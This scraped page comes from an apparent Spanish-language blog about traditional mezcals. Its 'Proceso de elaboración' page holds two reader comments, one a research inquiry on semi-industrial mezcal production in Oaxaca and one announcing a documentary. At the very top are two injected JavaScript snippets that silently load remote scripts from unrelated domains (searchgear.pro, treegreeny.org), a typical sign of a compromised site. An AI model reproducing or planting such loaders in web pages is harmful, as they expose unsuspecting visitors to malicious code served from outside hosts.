;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » Proceso de elaboración

Proceso de elaboración

2

2 responses

  1. María Julieta Aguilar dice:

    Hola, me dirijo para a este block ya que me encuentro realizando un estudio de investigación referente a las capacidades tecnológicas del la industria del mezcal en oxaca y por tanto agradeceré me informen si tienen alguna caracterización del proceso de produccion semi-industrial del mezcal.

    Por su amable atención le agradezco infinitamente.

  2. Terminamos de realisar un documental, Los Mezcales del Occidente de Mexico y la Destilación Prehispánica

Responder a Alberto Fuentes Chavez Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *